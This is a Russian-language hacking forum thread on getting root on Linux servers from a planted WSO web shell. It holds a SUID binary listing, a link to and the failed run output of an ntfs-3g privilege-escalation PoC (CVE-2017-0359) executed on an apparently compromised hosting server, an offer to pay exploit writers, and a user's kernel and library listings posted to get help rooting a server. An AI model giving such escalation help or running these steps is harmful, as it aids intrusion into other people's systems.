-rwsr-sr-x 1 root mail 89248 Feb 11 2015 /usr/bin/procmail
-rwsr-xr-x 1 root root 54192 Feb 24 10:09 /usr/bin/passwd
-rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 75376 Feb 24 10:09 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44464 Feb 24 10:09 /usr/bin/chsh
-rwsr-xr-x 1 root root 53616 Feb 24 10:09 /usr/bin/chfn
-rwsr-xr-x 1 root root 157760 Jan 11 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 146160 Jan 28 12:16 /bin/ntfs-3g
-rwsr-xr-x 1 root root 30800 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40168 Feb 24 10:09 /bin/su
-rwsr-xr-x 1 root root 27416 Mar 30 2015 /bin/umount
-rwsr-xr-x 1 root root 40000 Mar 30 2015 /bin/mount

meow MEOW!

p.s.

/bin/ntfs-3g

Code:
ntfs-3g: No device is specified.

ntfs-3g 2014.2.15AR.2 integrated FUSE 28 - Third Generation NTFS Driver
Configuration type 7, XATTRS are on, POSIX ACLS are on

Copyright (C) 2005-2007 Yura Pakhuchiy
Copyright (C) 2006-2009 Szabolcs Szakacsits
Copyright (C) 2007-2014 Jean-Pierre Andre
Copyright (C) 2009 Erik Larsson

Usage: ntfs-3g [-o option[,...]]

Options: ro (read-only mount), windows_names, uid=, gid=,
umask=, fmask=, dmask=, streams_interface=.
Please see the details in the manual (type: man ntfs-3g).

Example: ntfs-3g /dev/sda1 /mnt/windows

News, support and information: http://tuxera.com

одняко -> http://0day.today/exploit/26893 ->

Code:
sh-4.3$ /bin/bash /tmp/1.sh
/bin/bash /tmp/1.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
Gathering environment info ...
Creating kernel hijack directories ...
mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/lib': Permission denied
mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/kernel': Permission denied
Forging symlinks ...
ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/lib/modules\r/3.16.0-4-amd64\r\r': No such file or directory
ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/kernel/fs\r/fuse\r': No such file or directory
ln: failed to create symbolic link 'fuse.ko\r': Permission denied
Pulling in deps ...
Building kernel module ...
/tmp/1.sh: line 25: $'\r': command not found
/tmp/1.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')
: Permission denied cve_2017_0358.c

Dr_Wile

26.06.2017, 21:22

Вопрос скорее всего неоднократно задавался, но всё-таки...имея wso Шелл на сайте какие есть способы поднятия прав до рута?

З.Ы. понимаю что универсального решения нет в этом вопросе, можно на примере объяснить, или подсказать примерный алгоритм

ACat

29.06.2017, 11:18

Dr_Wile said:
↑ (https://antichat.live/posts/4100088/)
Вопрос скорее всего неоднократно задавался, но всё-таки...имея wso Шелл на сайте какие есть способы поднятия прав до рута?
З.Ы. понимаю что универсального решения нет в этом вопросе, можно на примере объяснить, или подсказать примерный алгоритм

ебануться. берешь да рутаешь, че.

Dr_Wile

29.06.2017, 13:00

ACat said:
↑ (https://antichat.live/posts/4100824/)
ебануться. берешь да рутаешь, че.

Какой исчерпывающий ответ

ACat

29.06.2017, 18:15

какой вопрос - такой ответ

r00t_hack

01.07.2017, 13:08

thank you for this service keep up man

ACat

04.07.2017, 17:15

ищу людей кто умеет писать эксплоиты уязвимостей типа буфер оверфлоу с целью повышения привелегий на UNIX подобных ОС. за деньги. ЛС.

Vip77

04.07.2017, 20:17

Буду очень благодарен за любую помощь

uname -a

Code:
Linux p314371.asd.ru 3.10.63-1.el6.elrepo.x86_64 #1 SMP Tue Dec 16 16:52:21 EST 2014 x86_64 x86_64 x86_64 GNU/Linux

ls -la /boot

Code:
total 145304
dr-xr-xr-x. 4 root root 4096 Aug 31 2016 .
dr-xr-xr-x. 22 root root 4096 Feb 3 00:35 ..
-rw-r--r-- 1 root root 171 Jul 25 2014 .vmlinuz-2.6.32-431.20.5.el6.x86_64.hmac
-rw-r--r-- 1 root root 2519609 Jul 25 2014 System.map-2.6.32-431.20.5.el6.x86_64
-rw------- 1 root root 2926925 Mar 17 2016 System.map-3.10.101-1.el6.elrepo.x86_64
-rw------- 1 root root 2928277 Aug 29 2016 System.map-3.10.103-1.el6.elrepo.x86_64
-rw-r--r-- 1 root root 2924029 Dec 17 2014 System.map-3.10.63-1.el6.elrepo.x86_64
-rw-r--r-- 1 root root 2925203 Jun 7 2015 System.map-3.10.80-1.el6.elrepo.x86_64
-rw-r--r-- 1 root root 2925063 Sep 22 2015 System.map-3.10.89-1.el6.elrepo.x86_64
-rw-r--r-- 1 root root 105200 Jul 25 2014 config-2.6.32-431.20.5.el6.x86_64
-rw-r--r-- 1 root root 142360 Mar 17 2016 config-3.10.101-1.el6.elrepo.x86_64
-rw-r--r-- 1 root root 142778 Aug 29 2016 config-3.10.103-1.el6.elrepo.x86_64
-rw-r--r-- 1 root root 142373 Dec 17 2014 config-3.10.63-1.el6.elrepo.x86_64
-rw-r--r-- 1 root root 142381 Jun 7 2015 config-3.10.80-1.el6.elrepo.x86_64
-rw-r--r-- 1 root root 142381 Sep 22 2015 config-3.10.89-1.el6.elrepo.x86_64
drwxr-xr-x. 3 root root 4096 Sep 28 2012 efi
drwxr-xr-x. 2 root root 4096 Aug 31 2016 grub
-rw-------. 1 root root 14203374 Aug 4 2014 initramfs-2.6.32-431.20.5.el6.x86_64.img
-rw------- 1 root root 17405311 Apr 5 2016 initramfs-3.10.101-1.el6.elrepo.x86_64.img
-rw------- 1 root root 17424573 Aug 31 2016 initramfs-3.10.103-1.el6.elrepo.x86_64.img
-rw------- 1 root root 17083963 Dec 22 2014 initramfs-3.10.63-1.el6.elrepo.x86_64.img
-rw------- 1 root root 17361940 Jun 9 2015 initramfs-3.10.80-1.el6.elrepo.x86_64.img
-rw------- 1 root root 17368226 Sep 24 2015 initramfs-3.10.89-1.el6.elrepo.x86_64.img
-rw-r--r-- 1 root root 193901 Jul 25 2014 symvers-2.6.32-431.20.5.el6.x86_64.gz
-rw-r--r-- 1 root root 258324 Mar 17 2016 symvers-3.10.101-1.el6.elrepo.x86_64.gz
-rw-r--r-- 1 root root 258396 Aug 29 2016 symvers-3.10.103-1.el6.elrepo.x86_64.gz
-rw-r--r-- 1 root root 258276 Dec 17 2014 symvers-3.10.63-1.el6.elrepo.x86_64.gz
-rw-r--r-- 1 root root 258289 Jun 7 2015 symvers-3.10.80-1.el6.elrepo.x86_64.gz
-rw-r--r-- 1 root root 258410 Sep 22 2015 symvers-3.10.89-1.el6.elrepo.x86_64.gz
-rwxr-xr-x 1 root root 4131440 Jul 25 2014 vmlinuz-2.6.32-431.20.5.el6.x86_64
-rwxr-xr-x 1 root root 4860304 Mar 17 2016 vmlinuz-3.10.101-1.el6.elrepo.x86_64
-rwxr-xr-x 1 root root 4865264 Aug 29 2016 vmlinuz-3.10.103-1.el6.elrepo.x86_64
-rwxr-xr-x 1 root root 4846192 Dec 17 2014 vmlinuz-3.10.63-1.el6.elrepo.x86_64
-rwxr-xr-x 1 root root 4852592 Jun 7 2015 vmlinuz-3.10.80-1.el6.elrepo.x86_64
-rwxr-xr-x 1 root root 4852592 Sep 22 2015 vmlinuz-3.10.89-1.el6.elrepo.x86_64

ls -la --full-time /lib

Code:
total 3796
dr-xr-xr-x. 10 root root 4096 2017-01-20 13:27:07.905172467 +0300 .
dr-xr-xr-x. 22 root root 4096 2017-02-03 00:35:44.699000000 +0300 ..
lrwxrwxrwx 1 root root 14 2016-08-31 11:54:58.256945288 +0300 cpp -> ../usr/bin/cpp
drwxr-xr-x. 45 root root 12288 2017-01-20 13:27:06.925187250 +0300 firmware
drwxr-xr-x 3 root root 4096 2016-05-10 16:16:57.000000000 +0300 i686
drwxr-xr-x. 6 root root 4096 2012-09-28 12:27:51.000000000 +0400 kbd
-rwxr-xr-x 1 root root 145272 2016-05-10 16:45:52.000000000 +0300 ld-2.12.so
lrwxrwxrwx 1 root root 10 2016-08-31 16:20:47.370693128 +0300 ld-linux.so.2 -> ld-2.12.so
-rwxr-xr-x 1 root root 7224 2016-05-10 16:45:54.000000000 +0300 libBrokenLocale-2.12.so
lrwxrwxrwx 1 root root 23 2016-08-31 16:20:47.372693095 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
-rwxr-xr-x 1 root root 20376 2016-05-10 16:45:54.000000000 +0300 libSegFault.so
-rwxr-xr-x 1 root root 13416 2016-05-10 16:45:54.000000000 +0300 libanl-2.12.so
lrwxrwxrwx 1 root root 14 2016-08-31 16:20:47.375693044 +0300 libanl.so.1 -> libanl-2.12.so
-rwxr-xr-x 1 root root 1908112 2016-05-10 16:45:55.000000000 +0300 libc-2.12.so
lrwxrwxrwx 1 root root 12 2016-08-31 16:20:47.490691114 +0300 libc.so.6 -> libc-2.12.so
-rwxr-xr-x 1 root root 190992 2016-05-10 16:45:53.000000000 +0300 libcidn-2.12.so
lrwxrwxrwx 1 root root 15 2016-08-31 16:20:47.500690946 +0300 libcidn.so.1 -> libcidn-2.12.so
-rwxr-xr-x 1 root root 38380 2016-05-10 16:45:53.000000000 +0300 libcrypt-2.12.so
lrwxrwxrwx 1 root root 16 2016-08-31 16:20:47.506690845 +0300 libcrypt.so.1 -> libcrypt-2.12.so
-rwxr-xr-x 1 root root 17896 2016-05-10 16:45:52.000000000 +0300 libdl-2.12.so
lrwxrwxrwx 1 root root 13 2016-08-31 16:20:47.507690829 +0300 libdl.so.2 -> libdl-2.12.so
lrwxrwxrwx 1 root root 17 2017-01-20 13:27:07.896172603 +0300 libexpat.so.1 -> libexpat.so.1.5.2
-rwxr-xr-x 1 root root 160956 2016-11-29 01:18:51.000000000 +0300 libexpat.so.1.5.2
-rw-r--r-- 1 root root 899 2016-07-12 18:29:13.000000000 +0300 libfreebl3.chk
-rwxr-xr-x 1 root root 9604 2016-07-12 18:29:13.000000000 +0300 libfreebl3.so
-rw-r--r-- 1 root root 899 2016-07-12 18:29:13.000000000 +0300 libfreeblpriv3.chk
-rwxr-xr-x 1 root root 378504 2016-07-12 18:29:13.000000000 +0300 libfreeblpriv3.so
-rwxr-xr-x 1 root root 200092 2016-05-10 16:45:54.000000000 +0300 libm-2.12.so
lrwxrwxrwx 1 root root 12 2016-08-31 16:20:47.519690627 +0300 libm.so.6 -> libm-2.12.so
-rwxr-xr-x 1 root root 113912 2016-05-10 16:45:55.000000000 +0300 libnsl-2.12.so
lrwxrwxrwx 1 root root 14 2016-08-31 16:20:47.525690527 +0300 libnsl.so.1 -> libnsl-2.12.so
-rwxr-xr-x 1 root root 40200 2016-05-10 16:45:54.000000000 +0300 libnss_compat-2.12.so
lrwxrwxrwx 1 root root 21 2016-08-31 16:20:47.528690476 +0300 libnss_compat.so.2 -> libnss_compat-2.12.so
-rwxr-xr-x 1 root root 25596 2016-05-10 16:45:54.000000000 +0300 libnss_dns-2.12.so
lrwxrwxrwx 1 root root 18 2016-08-31 16:20:47.530690443 +0300 libnss_dns.so.2 -> libnss_dns-2.12.so
-rwxr-xr-x 1 root root 58728 2016-05-10 16:45:53.000000000 +0300 libnss_files-2.12.so
lrwxrwxrwx 1 root root 20 2016-08-31 16:20:47.533690392 +0300 libnss_files.so.2 -> libnss_files-2.12.so
-rwxr-xr-x 1 root root 22140 2016-05-10 16:45:53.000000000 +0300 libnss_hesiod-2.12.so
lrwxrwxrwx 1 root root 21 2016-08-31 16:20:47.534690375 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
-rwxr-xr-x 1 root root 49712 2016-05-10 16:45:53.000000000 +0300 libnss_nis-2.12.so
lrwxrwxrwx 1 root root 18 2016-08-31 16:20:47.537690325 +0300 libnss_nis.so.2 -> libnss_nis-2.12.so
-rwxr-xr-x 1 root root 58712 2016-05-10 16:45:53.000000000 +0300 libnss_nisplus-2.12.so
lrwxrwxrwx 1 root root 22 2016-08-31 16:20:47.540690275 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
-rwxr-xr-x 1 root root 131260 2016-05-10 16:45:55.000000000 +0300 libpthread-2.12.so
lrwxrwxrwx 1 root root 18 2016-08-31 16:20:47.547690157 +0300 libpthread.so.0 -> libpthread-2.12.so
-rwxr-xr-x 1 root root 103388 2016-05-10 16:45:54.000000000 +0300 libresolv-2.12.so
lrwxrwxrwx 1 root root 17 2016-08-31 16:20:47.555690023 +0300 libresolv.so.2 -> libresolv-2.12.so
-rwxr-xr-x 1 root root 39764 2016-05-10 16:45:53.000000000 +0300 librt-2.12.so
lrwxrwxrwx 1 root root 13 2016-08-31 16:20:47.558689973 +0300 librt.so.1 -> librt-2.12.so
-rwxr-xr-x 1 root root 31620 2016-05-10 16:45:54.000000000 +0300 libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2016-08-31 16:20:47.560689939 +0300 libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 12792 2016-05-10 16:45:52.000000000 +0300 libutil-2.12.so
lrwxrwxrwx 1 root root 15 2016-08-31 16:20:47.561689922 +0300 libutil.so.1 -> libutil-2.12.so
dr-xr-xr-x. 8 root root 4096 2016-08-31 16:20:56.362542218 +0300 modules
drwxr-xr-x 3 root root 4096 2016-08-31 16:20:47.565689855 +0300 rtkaio
drwxr-xr-x. 2 root root 4096 2016-05-11 02:18:18.000000000 +0300 security
drwxr-xr-x. 6 root root 4096 2015-03-16 11:53:51.000000000 +0300 terminfo
drwxr-xr-x. 5 root root 4096 2016-09-14 15:20:27.466794682 +0300 udev

ls -la --full-time /lib64

Code:
total 16640
dr-xr-xr-x. 8 root root 12288 2017-01-20 13:27:07.373180492 +0300 .
dr-xr-xr-x. 22 root root 4096 2017-02-03 00:35:44.699000000 +0300 ..
-rw-r--r--. 1 root root 65 2011-12-07 23:13:53.000000000 +0400 .libfipscheck.so.1.1.0.hmac
lrwxrwxrwx. 1 root root 27 2012-09-28 12:27:44.000000000 +0400 .libfipscheck.so.1.hmac -> .libfipscheck.so.1.1.0.hmac
-rw-r--r-- 1 root root 65 2016-11-11 22:42:09.000000000 +0300 .libgcrypt.so.11.hmac
drwxr-xr-x 2 root root 4096 2016-04-05 14:18:15.198119825 +0300 dbus-1
-rwxr-xr-x 1 root root 154664 2016-05-10 17:11:19.000000000 +0300 ld-2.12.so
lrwxrwxrwx 1 root root 10 2016-08-31 16:19:30.983976451 +0300 ld-linux-x86-64.so.2 -> ld-2.12.so
-rwxr-xr-x 1 root root 8488 2016-05-10 17:11:21.000000000 +0300 libBrokenLocale-2.12.so
lrwxrwxrwx 1 root root 23 2016-08-31 16:19:30.984976434 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
-rwxr-xr-x 1 root root 21928 2016-05-10 17:11:20.000000000 +0300 libSegFault.so
lrwxrwxrwx. 1 root root 15 2012-09-28 12:27:28.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
-rwxr-xr-x. 1 root root 31280 2011-12-07 20:53:53.000000000 +0400 libacl.so.1.1.0
lrwxrwxrwx 1 root root 22 2014-06-17 13:19:37.000000000 +0400 libaio.so.1 -> /lib64/libaio.so.1.0.1
-rwxr-xr-x 1 root root 3944 2010-08-23 01:08:18.000000000 +0400 libaio.so.1.0.0
-rwxr-xr-x 1 root root 3944 2010-08-23 01:08:18.000000000 +0400 libaio.so.1.0.1
-rwxr-xr-x 1 root root 19368 2016-05-10 17:11:20.000000000 +0300 libanl-2.12.so
lrwxrwxrwx 1 root root 14 2016-08-31 16:19:30.987976384 +0300 libanl.so.1 -> libanl-2.12.so
lrwxrwxrwx 1 root root 18 2016-08-31 16:20:38.350844541 +0300 libasound.so.2 -> libasound.so.2.0.0
-rwxr-xr-x 1 root root 983440 2016-05-11 10:09:48.000000000 +0300 libasound.so.2.0.0
lrwxrwxrwx. 1 root root 16 2012-09-28 12:27:28.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
-rwxr-xr-x. 1 root root 18712 2011-09-23 22:53:58.000000000 +0400 libattr.so.1.1.0
lrwxrwxrwx 1 root root 17 2016-08-31 16:19:35.909893622 +0300 libaudit.so.1 -> libaudit.so.1.0.0
-rwxr-xr-x 1 root root 145864 2016-05-11 09:17:06.000000000 +0300 libaudit.so.1.0.0
lrwxrwxrwx 1 root root 19 2016-08-31 16:19:35.920893437 +0300 libauparse.so.0 -> libauparse.so.0.0.0
-rwxr-xr-x 1 root root 88672 2016-05-11 09:17:06.000000000 +0300 libauparse.so.0.0.0
lrwxrwxrwx 1 root root 17 2017-01-20 13:26:14.641975855 +0300 libblkid.so.1 -> libblkid.so.1.1.0
-rwxr-xr-x 1 root root 136136 2016-11-18 18:38:31.000000000 +0300 libblkid.so.1.1.0
lrwxrwxrwx. 1 root root 15 2012-09-28 12:27:29.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4
-rwxr-xr-x. 1 root root 67592 2011-06-25 05:45:55.000000000 +0400 libbz2.so.1.0.4
-rwxr-xr-x 1 root root 1923352 2016-05-10 17:11:22.000000000 +0300 libc-2.12.so
lrwxrwxrwx 1 root root 12 2016-08-31 16:19:31.087974702 +0300 libc.so.6 -> libc-2.12.so
lrwxrwxrwx. 1 root root 18 2012-09-28 12:27:42.000000000 +0400 libcap-ng.so.0 -> libcap-ng.so.0.0.0
-rwxr-xr-x. 1 root root 18672 2011-06-25 07:49:32.000000000 +0400 libcap-ng.so.0.0.0
lrwxrwxrwx. 1 root root 14 2012-09-28 12:27:28.000000000 +0400 libcap.so.2 -> libcap.so.2.16
-rwxr-xr-x. 1 root root 16600 2011-12-08 00:04:01.000000000 +0400 libcap.so.2.16
lrwxrwxrwx 1 root root 19 2016-09-01 13:31:20.935441246 +0300 libcgroup.so.1 -> libcgroup.so.1.0.40
-rwxr-xr-x 1 root root 100488 2016-07-12 19:27:19.000000000 +0300 libcgroup.so.1.0.40
-rwxr-xr-x 1 root root 197064 2016-05-10 17:11:19.000000000 +0300 libcidn-2.12.so
lrwxrwxrwx 1 root root 15 2016-08-31 16:19:31.096974551 +0300 libcidn.so.1 -> libcidn-2.12.so
lrwxrwxrwx 1 root root 17 2015-09-24 13:39:12.714000000 +0300 libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 14664 2015-07-24 13:33:24.000000000 +0300 libcom_err.so.2.1
-rwxr-xr-x 1 root root 40400 2016-05-10 17:11:20.000000000 +0300 libcrypt-2.12.so
lrwxrwxrwx 1 root root 16 2016-08-31 16:19:31.099974500 +0300 libcrypt.so.1 -> libcrypt-2.12.so
-rwxr-xr-x 1 root root 1525560 2017-01-11 21:40:04.000000000 +0300 libdb-4.7.so
lrwxrwxrwx 1 root root 18 2015-06-09 15:16:04.212000000 +0300 libdbus-1.so.3 -> libdbus-1.so.3.4.0
-rwxr-xr-x 1 root root 265728 2015-04-22 13:52:25.000000000 +0300 libdbus-1.so.3.4.0
-rwxr-xr-x 1 root root 19536 2016-05-10 17:11:19.000000000 +0300 libdl-2.12.so
lrwxrwxrwx 1 root root 13 2016-08-31 16:19:31.100974484 +0300 libdl.so.2 -> libdl-2.12.so
lrwxrwxrwx 1 root root 13 2015-09-24 13:39:23.481000000 +0300 libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root 28120 2015-07-24 13:33:24.000000000 +0300 libe2p.so.2.3
lrwxrwxrwx 1 root root 17 2017-01-20 13:26:13.981985808 +0300 libexpat.so.1 -> libexpat.so.1.5.2
-rwxr-xr-x 1 root root 165040 2016-11-29 01:21:21.000000000 +0300 libexpat.so.1.5.2
lrwxrwxrwx 1 root root 16 2015-09-24 13:39:23.486000000 +0300 libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root 201784 2015-07-24 13:33:24.000000000 +0300 libext2fs.so.2.4
lrwxrwxrwx. 1 root root 21 2012-09-28 12:27:44.000000000 +0400 libfipscheck.so.1 -> libfipscheck.so.1.1.0
-rwxr-xr-x. 1 root root 10288 2011-12-07 23:13:53.000000000 +0400 libfipscheck.so.1.1.0
-rw-r--r-- 1 root root 899 2016-07-12 18:35:41.000000000 +0300 libfreebl3.chk
-rwxr-xr-x 1 root root 10312 2016-07-12 18:35:41.000000000 +0300 libfreebl3.so
-rw-r--r-- 1 root root 899 2016-07-12 18:35:41.000000000 +0300 libfreeblpriv3.chk
-rwxr-xr-x 1 root root 477712 2016-07-12 18:35:41.000000000 +0300 libfreeblpriv3.so
-rwxr-xr-x 1 root root 90880 2016-05-10 12:38:12.000000000 +0300 libgcc_s-4.4.7-20120601.so.1
lrwxrwxrwx 1 root root 28 2016-08-31 11:54:57.160963302 +0300 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1
lrwxrwxrwx 1 root root 19 2017-01-20 13:27:07.344180930 +0300 libgcrypt.so.11 -> libgcrypt.so.11.5.3
-rwxr-xr-x 1 root root 478496 2016-11-11 22:42:09.000000000 +0300 libgcrypt.so.11.5.3
lrwxrwxrwx 1 root root 22 2016-08-31 16:19:35.985892344 +0300 libgio-2.0.so.0 -> libgio-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 1148296 2016-05-11 01:41:53.000000000 +0300 libgio-2.0.so.0.2800.8
lrwxrwxrwx 1 root root 23 2016-08-31 16:19:36.050891252 +0300 libglib-2.0.so.0 -> libglib-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 1140496 2016-05-11 01:41:53.000000000 +0300 libglib-2.0.so.0.2800.8
lrwxrwxrwx 1 root root 26 2016-08-31 16:19:36.122890041 +0300 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 11832 2016-05-11 01:41:53.000000000 +0300 libgmodule-2.0.so.0.2800.8
lrwxrwxrwx 1 root root 26 2016-08-31 16:19:36.126889974 +0300 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 308848 2016-05-11 01:41:53.000000000 +0300 libgobject-2.0.so.0.2800.8
lrwxrwxrwx. 1 root root 21 2012-09-28 12:27:31.000000000 +0400 libgpg-error.so.0 -> libgpg-error.so.0.5.0
-rwxr-xr-x. 1 root root 14288 2011-12-07 21:37:21.000000000 +0400 libgpg-error.so.0.5.0
lrwxrwxrwx 1 root root 21 2016-08-31 16:19:35.584899087 +0300 libgssapi_krb5.so.2 -> libgssapi_krb5.so.2.2
-rwxr-xr-x 1 root root 277704 2016-05-11 01:56:56.000000000 +0300 libgssapi_krb5.so.2.2
lrwxrwxrwx 1 root root 16 2016-08-31 16:19:35.611898633 +0300 libgssrpc.so.4 -> libgssrpc.so.4.1
-rwxr-xr-x 1 root root 131384 2016-05-11 01:56:56.000000000 +0300 libgssrpc.so.4.1
lrwxrwxrwx 1 root root 26 2016-08-31 16:19:36.146889637 +0300 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 17536 2016-05-11 01:41:53.000000000 +0300 libgthread-2.0.so.0.2800.8
lrwxrwxrwx. 1 root root 16 2012-09-28 12:27:31.000000000 +0400 libidn.so.11 -> libidn.so.11.6.1
-rwxr-xr-x. 1 root root 206672 2010-08-24 04:51:20.000000000 +0400 libidn.so.11.6.1
lrwxrwxrwx 1 root root 34 2015-09-24 13:44:32.109000000 +0300 libip4tc.so.0 -> /etc/alternatives/libip4tc0.x86_64
lrwxrwxrwx 1 root root 23 2015-09-24 13:40:38.566000000 +0300 libip4tc.so.0-1.4.7 -> libip4tc.so.0.0.0-1.4.7
lrwxrwxrwx 1 root root 36 2015-09-24 13:44:32.109000000 +0300 libip4tc.so.0.0.0 -> /etc/alternatives/libip4tc000.x86_64
-rwxr-xr-x 1 root root 26360 2015-07-24 05:10:22.000000000 +0300 libip4tc.so.0.0.0-1.4.7
lrwxrwxrwx 1 root root 34 2015-09-24 13:44:32.109000000 +0300 libip6tc.so.0 -> /etc/alternatives/libip6tc0.x86_64
lrwxrwxrwx 1 root root 23 2015-09-24 13:40:38.568000000 +0300 libip6tc.so.0-1.4.7 -> libip6tc.so.0.0.0-1.4.7
lrwxrwxrwx 1 root root 36 2015-09-24 13:44:32.109000000 +0300 libip6tc.so.0.0.0 -> /etc/alternatives/libip6tc000.x86_64
-rwxr-xr-x 1 root root 28064 2015-07-24 05:10:22.000000000 +0300 libip6tc.so.0.0.0-1.4.7
lrwxrwxrwx 1 root root 32 2015-09-24 13:44:32.109000000 +0300 libipq.so.0 -> /etc/alternatives/libipq0.x86_64
lrwxrwxrwx 1 root root 21 2015-09-24 13:40:38.570000000 +0300 libipq.so.0-1.4.7 -> libipq.so.0.0.0-1.4.7
lrwxrwxrwx 1 root root 34 2015-09-24 13:44:32.109000000 +0300 libipq.so.0.0.0 -> /etc/alternatives/libipq000.x86_64
-rwxr-xr-x 1 root root 9280 2015-07-24 05:10:22.000000000 +0300 libipq.so.0.0.0-1.4.7
lrwxrwxrwx 1 root root 33 2015-09-24 13:44:32.109000000 +0300 libiptc.so.0 -> /etc/alternatives/libiptc0.x86_64
lrwxrwxrwx 1 root root 22 2015-09-24 13:40:38.571000000 +0300 libiptc.so.0-1.4.7 -> libiptc.so.0.0.0-1.4.7
lrwxrwxrwx 1 root root 35 2015-09-24 13:44:32.109000000 +0300 libiptc.so.0.0.0 -> /etc/alternatives/libiptc000.x86_64
-rwxr-xr-x 1 root root 3680 2015-07-24 05:10:21.000000000 +0300 libiptc.so.0.0.0-1.4.7
lrwxrwxrwx 1 root root 18 2016-08-31 16:19:35.625898397 +0300 libk5crypto.so.3 -> libk5crypto.so.3.1
-rwxr-xr-x 1 root root 174840 2016-05-11 01:56:56.000000000 +0300 libk5crypto.so.3.1
lrwxrwxrwx 1 root root 18 2014-12-01 11:49:42.935000000 +0300 libkeyutils.so.1 -> libkeyutils.so.1.3
-rwxr-xr-x 1 root root 10192 2014-10-15 15:08:05.000000000 +0400 libkeyutils.so.1.3
lrwxrwxrwx 1 root root 14 2016-08-31 16:19:35.643898095 +0300 libkrb5.so.3 -> libkrb5.so.3.3
-rwxr-xr-x 1 root root 946048 2016-05-11 01:56:56.000000000 +0300 libkrb5.so.3.3
lrwxrwxrwx 1 root root 21 2016-08-31 16:19:35.721896783 +0300 libkrb5support.so.0 -> libkrb5support.so.0.1
-rwxr-xr-x 1 root root 43728 2016-05-11 01:56:56.000000000 +0300 libkrb5support.so.0.1
lrwxrwxrwx 1 root root 21 2016-08-31 16:19:40.845810635 +0300 liblber-2.4.so.2 -> liblber-2.4.so.2.10.3
-rwxr-xr-x 1 root root 60512 2016-05-11 02:32:56.000000000 +0300 liblber-2.4.so.2.10.3
lrwxrwxrwx 1 root root 21 2016-08-31 16:19:40.849810568 +0300 libldap-2.4.so.2 -> libldap-2.4.so.2.10.3
-rwxr-xr-x 1 root root 330864 2016-05-11 02:32:56.000000000 +0300 libldap-2.4.so.2.10.3
lrwxrwxrwx 1 root root 23 2016-08-31 16:19:40.868810249 +0300 libldap_r-2.4.so.2 -> libldap_r-2.4.so.2.10.3
-rwxr-xr-x 1 root root 356048 2016-05-11 02:32:56.000000000 +0300 libldap_r-2.4.so.2.10.3
lrwxrwxrwx 1 root root 21 2016-08-31 16:19:40.881810030 +0300 libldif-2.4.so.2 -> libldif-2.4.so.2.10.3
-rwxr-xr-x 1 root root 5960 2016-05-11 02:32:56.000000000 +0300 libldif-2.4.so.2.10.3
-rwxr-xr-x 1 root root 596360 2016-05-10 17:11:21.000000000 +0300 libm-2.12.so
lrwxrwxrwx 1 root root 12 2016-08-31 16:19:31.137973862 +0300 libm.so.6 -> libm-2.12.so
lrwxrwxrwx 1 root root 17 2017-01-20 13:26:14.748974241 +0300 libmount.so.1 -> libmount.so.1.1.0
-rwxr-xr-x 1 root root 65856 2016-11-18 18:38:31.000000000 +0300 libmount.so.1.1.0
lrwxrwxrwx 1 root root 17 2015-09-24 13:39:11.291000000 +0300 libncurses.so.5 -> libncurses.so.5.7
-rwxr-xr-x 1 root root 139784 2015-03-16 11:54:00.000000000 +0300 libncurses.so.5.7
lrwxrwxrwx 1 root root 18 2015-09-24 13:39:11.302000000 +0300 libncursesw.so.5 -> libncursesw.so.5.7
-rwxr-xr-x 1 root root 189368 2015-03-16 11:54:00.000000000 +0300 libncursesw.so.5.7
lrwxrwxrwx. 1 root root 20 2012-09-28 12:27:33.000000000 +0400 libnih-dbus.so.1 -> libnih-dbus.so.1.0.0
-rwxr-xr-x. 1 root root 39896 2011-12-07 21:40:52.000000000 +0400 libnih-dbus.so.1.0.0
lrwxrwxrwx. 1 root root 15 2012-09-28 12:27:33.000000000 +0400 libnih.so.1 -> libnih.so.1.0.0
-rwxr-xr-x. 1 root root 101920 2011-12-07 21:40:52.000000000 +0400 libnih.so.1.0.0
lrwxrwxrwx 1 root root 14 2014-06-17 13:10:48.000000000 +0400 libnl.so.1 -> libnl.so.1.1.4
-rwxr-xr-x 1 root root 337248 2013-11-22 15:27:57.000000000 +0400 libnl.so.1.1.4
-rwxr-xr-x 1 root root 113432 2016-05-10 17:11:21.000000000 +0300 libnsl-2.12.so
lrwxrwxrwx 1 root root 14 2016-08-31 16:19:31.144973744 +0300 libnsl.so.1 -> libnsl-2.12.so
